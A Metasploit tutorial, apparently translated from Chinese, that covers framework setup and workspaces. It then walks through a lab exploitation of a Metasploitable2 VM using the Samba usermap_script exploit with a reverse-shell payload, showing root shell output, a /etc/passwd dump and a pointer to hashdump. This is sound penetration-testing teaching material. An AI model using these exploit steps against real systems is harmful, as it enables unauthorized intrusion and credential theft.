Exploitation Practice

Introduction to the Metasploit Framework

Metasploit Framework Overview

  • Metasploit Framework is Rapid7's open-source vulnerability development and exploitation framework (free); a commercial (paid) edition is also offered.
  • Download: https://www.metasploit.com/

  • The goal of the Metasploit Framework is to help IT staff carry out assessments more effectively. The framework is written in Ruby; to use it in depth, learning Ruby is recommended.
  • Every task in the Metasploit Framework is implemented as a module, which makes the framework easy to extend and program and makes complex security assessments easier to carry out.
  • The structure of the Metasploit Framework can be divided into libraries, interfaces, and modules.

Metasploit Libraries

  • The Metasploit Framework provides a programming API so that users can develop modules; the libraries are pre-packaged code that users call directly, leaving only the logic to be designed.
  • Library location: /usr/share/metasploit-framework/lib/
┌──(root💀kali)-[~/Desktop]
└─# ls /usr/share/metasploit-framework/lib/
anemone        expect.rb   msf_autoload.rb  net              rabal       rex        rubocop  sqlmap     telephony.rb
anemone.rb     metasploit  msfenv.rb        postgres         rbmysql     rex.rb     snmp     tasks      windows_console_color_support.rb
enumerable.rb  msf         msf.rb           postgres_msf.rb  rbmysql.rb  robots.rb  snmp.rb  telephony
  • The Rex library provides the various class libraries used by exploits, as well as socket connections, raw functions and various other reformatting helpers.
┌──(root💀kali)-[/usr/share/metasploit-framework]
└─# ls lib/rex
crypto         google  job_container.rb  json_hash_file.rb  logging.rb  parser    payloads.rb  post.rb  proto.rb  script.rb           service.rb  tar.rb             time.rb         ui     user_agent.rb
exceptions.rb  io      job.rb            logging            mac_oui.rb  payloads  post         proto    script    service_manager.rb  services    thread_factory.rb  transformer.rb  ui.rb
  • The core library provides the basic application programming interface (API) for all new modules.
┌──(root💀kali)-[/usr/share/metasploit-framework]
└─# ls lib/msf/core 
analyze.rb         db_import_error.rb  event_dispatcher.rb  general_event_subscriber.rb  module_set.rb         opt_enum.rb            opt_regexp.rb         post                      session
author.rb          db_manager          exception.rb         handler                      modules.rb            opt_float.rb           opt_string.rb         post_mixin.rb             session_event.rb
auxiliary          db_manager.rb       exe                  handler.rb                   nop.rb                opt_http_rhost_url.rb  payload               post.rb                   session_manager.rb
auxiliary.rb       encoded_payload.rb  exploit              host_state.rb                opt_address_local.rb  opt_int.rb             payload_generator.rb  README.md                 session.rb
cert_provider.rb   encoder             exploit_driver.rb    module                       opt_address_range.rb  option_container.rb    payload.rb            reference.rb              site_reference.rb
constants.rb       encoder.rb          exploit_event.rb     module_manager               opt_address.rb        opt_path.rb            payload_set.rb        reflective_dll_loader.rb  target.rb
database_event.rb  encoding            exploit.rb           module_manager.rb            opt_base.rb           opt_port.rb            platform.rb           rpc                       thread_manager.rb
data_store.rb      evasion_driver.rb   feature_manager.rb   module.rb                    opt_bool.rb           opt_raw.rb             plugin_manager.rb     rpc.rb                    web_services
db_export.rb       evasion.rb          framework.rb         modules                      opt_condition.rb      opt.rb                 plugin.rb             service_state.rb          web_services.rb

Metasploit Interfaces

  • The latest Metasploit Framework provides two interfaces: a console and a GUI. The console interface is started by typing msfconsole in a terminal.
┌──(root💀kali)-[~/Desktop]
└─# msfconsole

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.                                                                                                 
                 ; |___      \-``                                                                                              
                 \   --<                                                                                                         
                  `.`.<                                                                                                         
                    `-'                                                                                                        


       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command

msf6 > 
  • For the GUI interface Metasploit uses Armitage. The latest Kali Linux does not bundle Armitage, so it has to be installed manually by typing apt-get install armitage in a terminal.
┌──(root💀kali)-[~/Desktop]
└─# apt-get install armitage
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
下列【新】软件包将被安装:
  armitage
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 2 个软件包未被升级。
需要下载 3,916 kB 的归档。
解压缩后会消耗 8,252 kB 的额外空间。
获取:1 http://mirrors.aliyun.com/kali kali-rolling/main amd64 armitage all 20160709+ds1-0kali2 [3,916 kB]
已下载 3,916 kB,耗时 6秒 (610 kB/s)                                                                                                                                                                                                       
正在选中未选择的软件包 armitage。
(正在读取数据库 ... 系统当前共安装有 267967 个文件和目录。)
准备解压 .../armitage_20160709+ds1-0kali2_all.deb  ...
正在解压 armitage (20160709+ds1-0kali2) ...
正在设置 armitage (20160709+ds1-0kali2) ...
正在处理用于 kali-menu (2021.1.4) 的触发器 ...
  • Type armitage in a terminal to start the GUI version of the Metasploit Framework.
# On a first install the Metasploit Framework database files must be initialized first
┌──(root💀kali)-[~/Desktop]
└─# msfdb init              
[+] Starting database
[+] Creating database user 'msf'
为新角色输入的口令: 
再输入一遍: 
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

┌──(root💀kali)-[~/Desktop]
└─# armitage
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

  • The next time the Metasploit Framework is started, run systemctl start postgresql to start the service Armitage depends on.
┌──(root💀kali)-[~/Desktop]
└─# systemctl start postgresql                                                                                                  

┌──(root💀kali)-[~/Desktop]
└─# systemctl status postgresql
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Wed 2021-03-17 08:31:33 EDT; 1min 58s ago
    Process: 1464 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 1464 (code=exited, status=0/SUCCESS)
        CPU: 3ms

3月 17 08:31:33 kali systemd[1]: Starting PostgreSQL RDBMS...
3月 17 08:31:33 kali systemd[1]: Finished PostgreSQL RDBMS.

Metasploit Modules

  • In Metasploit every task is carried out in a modular way; to make the modules easier to manage, Metasploit classifies modules with different functions by what they actually do.
  • Exploit modules, Payload modules, Auxiliary modules, Post modules, Encoder modules, NOP (no-operation) modules, and Evasion modules.

  • On Kali Linux the Metasploit Framework stores its modules in the /usr/share/metasploit-framework/modules directory.

┌──(root💀kali)-[~/Desktop]
└─# ls /usr/share/metasploit-framework/modules
auxiliary  encoders  evasion  exploits  nops  payloads  post

Metasploit Database Setup

  • When starting Metasploit it is recommended to initialize the database files and run the postgresql database. The database files are initialized with msfdb init. After initialization, use db_status in msfconsole to check the database connection status.
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Metasploit Workspace Management

  • In the msfconsole console, workspaces are used to keep different work tasks apart. The default workspace is default. Use workspace -h to see the available commands.
msf6 > workspace -h
Usage:
    workspace                  List workspaces
    workspace -v               List workspaces verbosely
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r <old> <new>   Rename workspace
    workspace -h               Show this help information

  • workspace -v lists the workspaces with details; plain workspace lists only the workspace names.
msf6 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0
  • workspace -a <name> adds a workspace with the given name to msfconsole.
msf6 > workspace -a test
[*] Added workspace: test
[*] Workspace: test
  • workspace -d <name> deletes the workspace with the given name.
msf6 > workspace -a
  default
  test
* test2
msf6 > workspace -d test2
[*] Deleted workspace: test2
[*] Switched to workspace: default
msf6 > workspace -a
  test
* default
  • workspace -r <old name> <new name> renames a workspace.
msf6 > workspace -a
  test
* default
msf6 > workspace -r test newtest
[*] Renamed workspace 'test' to 'newtest'
msf6 > workspace -a
  newtest
* default
  • Because the msfconsole terminal can only test one target at a time, workspaces give a way to separate tasks; using a different workspace for each task is recommended. Use workspace <name> to switch workspaces.
msf6 > workspace -a
  newtest
* default
msf6 > workspace newtest
[*] Workspace: newtest
msf6 > workspace -a
  default
* newtest

Note: do not use workspace -D lightly; it deletes all workspaces at once.

Basic Exploit Use in Metasploit

Lab Environment Introduction and Setup

  • Metasploitable2 is a purpose-built Ubuntu virtual system designed for testing security tools and demonstrating common vulnerability attacks. Version 3 is also available for download and contains more usable vulnerabilities than the previous version. This virtual system is compatible with VMware, VirtualBox and other virtualization platforms. By default only one network adapter is enabled, using NAT and Host-only; this image must never be exposed on a network where it could be attacked.
  • Download: https://sourceforge.net/projects/metasploitable/
  • Installation and use.
  • After downloading, unpack the archive, open the .vmx file in the virtualization software, and click Power On / Start the guest.

  • Log in with the username msfadmin and password msfadmin, then scan with netdiscover -r 192.168.10.1/24.
┌──(root💀kali)-[~/桌面]
└─# netdiscover -r 192.168.10.1/24 
 Currently scanning: Finished!   |   Screen View: Unique Hosts            

 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300                                                                                                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.10.1    00:50:56:c0:00:08      1      60  VMware, Inc.                                                             
 192.168.10.2    00:50:56:e6:53:88      1      60  VMware, Inc.                                                             
 192.168.10.183  00:0c:29:10:d2:96      1      60  VMware, Inc.                                                             
 192.168.10.254  00:50:56:fc:3f:5d      2     120  VMware, Inc.  

Probing the Target with Nmap and Saving the Results

  • In a terminal, run nmap -sV -P0 192.168.10.183 -oA target
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -P0 192.168.10.183 -oA target                                                                                                                                                                                            
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 21:16 EDT
Nmap scan report for 192.168.10.183
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:10:D2:96 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.08 seconds
  • After the scan finishes, use ls -alh to view the output files.
┌──(root💀kali)-[~/桌面]
└─# ls -alh
总用量 28K
drwxr-xr-x  2 root root 4.0K  3月 17 21:16 .
drwx------ 20 root root 4.0K  3月 17 21:09 ..
-rw-r--r--  1 root root 1.4K  3月 17 21:16 target.gnmap
-rw-r--r--  1 root root 1.7K  3月 17 21:16 target.nmap
-rw-r--r--  1 root root  11K  3月 17 21:16 target.xml

Importing Nmap Results into Metasploit

  • Open msfconsole in a terminal to get the Metasploit Framework console interface, and use db_import to import the scan result XML file.
┌──(root💀kali)-[~/桌面]
└─# db_import 路径/文件名.xml
# This approach did not work for me

# Instead, run the scan directly from msfconsole: db_nmap 192.168.10.183
msf6 > db_nmap 192.168.10.183
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 21:45 EDT
[*] Nmap: Nmap scan report for 192.168.10.183
[*] Nmap: Host is up (0.0043s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 21/tcp   open  ftp
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 23/tcp   open  telnet
[*] Nmap: 25/tcp   open  smtp
[*] Nmap: 53/tcp   open  domain
[*] Nmap: 80/tcp   open  http
[*] Nmap: 111/tcp  open  rpcbind
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 512/tcp  open  exec
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell
[*] Nmap: 1099/tcp open  rmiregistry
[*] Nmap: 1524/tcp open  ingreslock
[*] Nmap: 2049/tcp open  nfs
[*] Nmap: 2121/tcp open  ccproxy-ftp
[*] Nmap: 3306/tcp open  mysql
[*] Nmap: 5432/tcp open  postgresql
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: 6000/tcp open  X11
[*] Nmap: 6667/tcp open  irc
[*] Nmap: 8009/tcp open  ajp13
[*] Nmap: 8180/tcp open  unknown
[*] Nmap: MAC Address: 00:0C:29:10:D2:96 (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
  • Use hosts to check whether the import succeeded.
msf6 > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.10.183  00:0c:29:10:d2:96        Unknown                    device
  • Use services to view the service information in the current workspace.
msf6 > services
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.10.183  21    tcp    ftp           open
192.168.10.183  22    tcp    ssh           open
192.168.10.183  23    tcp    telnet        open
192.168.10.183  25    tcp    smtp          open
192.168.10.183  53    tcp    domain        open
192.168.10.183  80    tcp    http          open
192.168.10.183  111   tcp    rpcbind       open
192.168.10.183  139   tcp    netbios-ssn   open
192.168.10.183  445   tcp    microsoft-ds  open
192.168.10.183  512   tcp    exec          open
192.168.10.183  513   tcp    login         open
192.168.10.183  514   tcp    shell         open
192.168.10.183  1099  tcp    rmiregistry   open
192.168.10.183  1524  tcp    ingreslock    open
192.168.10.183  2049  tcp    nfs           open
192.168.10.183  2121  tcp    ccproxy-ftp   open
192.168.10.183  3306  tcp    mysql         open
192.168.10.183  5432  tcp    postgresql    open
192.168.10.183  5900  tcp    vnc           open
192.168.10.183  6000  tcp    x11           open
192.168.10.183  6667  tcp    irc           open
192.168.10.183  8009  tcp    ajp13         open
192.168.10.183  8180  tcp    unknown       open
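db_import and db_nmap fill the hosts and services tables above from Nmap's XML report, which is the target.xml that -oA wrote earlier. The following is an added example, not Metasploit code, that parses that XML format the same way: hosts Nmap reports as up become host records, open ports become service records, and the product/version/extrainfo attributes that -sV writes are joined into the info column. The XML document in it is constructed for the example (a trimmed version of what nmap -sV -P0 192.168.10.183 -oA target would produce) and is the only input it uses.

```python
"""Parse Nmap XML (the <name>.xml that nmap -oA writes) into host and
service records, mirroring what msfconsole's db_import stores before
`hosts` and `services` display it.  Added example, not Metasploit code;
SAMPLE_NMAP_XML is constructed and carries only the elements read here."""
import xml.etree.ElementTree as ET

# Constructed sample: one host that is up (two open ports, one closed) and
# one host that is down.  Attribute names follow Nmap's XML schema.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -P0 192.168.10.183 -oA target" version="7.91">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.10.183" addrtype="ipv4"/>
    <address addr="00:0C:29:10:D2:96" addrtype="mac" vendor="VMware"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" extrainfo="protocol 2.0" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8443">
        <state state="closed" reason="reset"/>
        <service name="https-alt" method="table" conf="3"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.10.184" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def service_info(svc):
    """Join the -sV attributes the way the services table's info column shows them."""
    if svc is None:
        return ""
    return " ".join(v for v in (svc.get("product"), svc.get("version"), svc.get("extrainfo")) if v)


def parse_nmap_xml(xml_text):
    """Return (hosts, services) as db_import would record them."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                      # hosts not seen as up are not stored
        ipv4 = host.find("address[@addrtype='ipv4']")
        if ipv4 is None:
            continue
        addr = ipv4.get("addr")
        mac = host.find("address[@addrtype='mac']")
        hosts.append({"address": addr,
                      "mac": mac.get("addr").lower() if mac is not None else ""})
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                  # only open ports become service rows
            svc = port.find("service")
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name", "") if svc is not None else "",
                "state": "open",
                # Without -sV these attributes are absent and info stays empty,
                # which is what the db_nmap run above shows.
                "info": service_info(svc),
            })
    return hosts, services


def format_services(services):
    """Render rows in the column layout msfconsole's `services` uses."""
    lines = [f"{'host':<16}{'port':<6}{'proto':<7}{'name':<14}{'state':<7}info",
             f"{'----':<16}{'----':<6}{'-----':<7}{'----':<14}{'-----':<7}----"]
    for s in services:
        lines.append(f"{s['host']:<16}{s['port']:<6}{s['proto']:<7}{s['name']:<14}{s['state']:<7}{s['info']}")
    return "\n".join(lines)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(f"{len(hosts)} host(s), {len(services)} open service(s)")
    print(format_services(services))
```

The services table on this page has an empty info column because db_nmap was run without -sV; importing the target.xml produced by the earlier -sV scan would carry the version strings across, which is what the parser's info field reproduces.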

Exploiting a Vulnerability with Metasploit

  • Use the search command to find matching entries.
msf6 > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations


Interact with a module by name or index. For example info 25, use 25 or use post/linux/gather/enum_configs

  • Use info <exploit path> to view the vulnerability information.
msf6 > info exploit/multi/samba/usermap_script 

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
  • Load the exploit with use <exploit path>, then use set payload to choose the shell to be returned.
msf6 > use exploit/multi/samba/usermap_script 
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/
set payload cmd/unix/bind_awk                   set payload cmd/unix/bind_ruby                  set payload cmd/unix/reverse_ksh                set payload cmd/unix/reverse_r
set payload cmd/unix/bind_busybox_telnetd       set payload cmd/unix/bind_ruby_ipv6             set payload cmd/unix/reverse_lua                set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_inetd                 set payload cmd/unix/bind_socat_udp             set payload cmd/unix/reverse_ncat_ssl           set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/bind_jjs                   set payload cmd/unix/bind_zsh                   set payload cmd/unix/reverse_netcat             set payload cmd/unix/reverse_socat_udp
set payload cmd/unix/bind_lua                   set payload cmd/unix/generic                    set payload cmd/unix/reverse_netcat_gaping      set payload cmd/unix/reverse_ssh
set payload cmd/unix/bind_netcat                set payload cmd/unix/pingback_bind              set payload cmd/unix/reverse_openssl            set payload cmd/unix/reverse_ssl_double_telnet
set payload cmd/unix/bind_netcat_gaping         set payload cmd/unix/pingback_reverse           set payload cmd/unix/reverse_perl               set payload cmd/unix/reverse_tclsh
set payload cmd/unix/bind_netcat_gaping_ipv6    set payload cmd/unix/reverse                    set payload cmd/unix/reverse_perl_ssl           set payload cmd/unix/reverse_zsh
set payload cmd/unix/bind_perl                  set payload cmd/unix/reverse_awk                set payload cmd/unix/reverse_php_ssl            
set payload cmd/unix/bind_perl_ipv6             set payload cmd/unix/reverse_bash_telnet_ssl    set payload cmd/unix/reverse_python             
set payload cmd/unix/bind_r                     set payload cmd/unix/reverse_jjs                set payload cmd/unix/reverse_python_ssl         
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
  • show options displays the options that need to be configured.
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.184   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
  • Use set <option name> <value> to set the options.
# Set the target IP
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.10.183
rhosts => 192.168.10.183
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.10.183   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.184   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
  • Use run or exploit to launch the exploit.
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.10.184:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo bVosoMqzNnUV2S88;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "bVosoMqzNnUV2S88\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.184:4444 -> 192.168.10.183:36435) at 2021-03-17 22:09:13 -0400


id
uid=0(root) gid=0(root)
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
  • Use sessions to view all connected devices.
^Z
Background session 2? [y/N]  Y
msf6 exploit(multi/samba/usermap_script) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:50367 (192.168.10.183)

  • Use sessions -l to view the current background sessions and sessions -i <id> to switch to a session.
msf6 exploit(multi/samba/usermap_script) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:50367 (192.168.10.183)

msf6 exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 2...
  • Use hashdump from the post modules to obtain the target's hashes once a session is established.
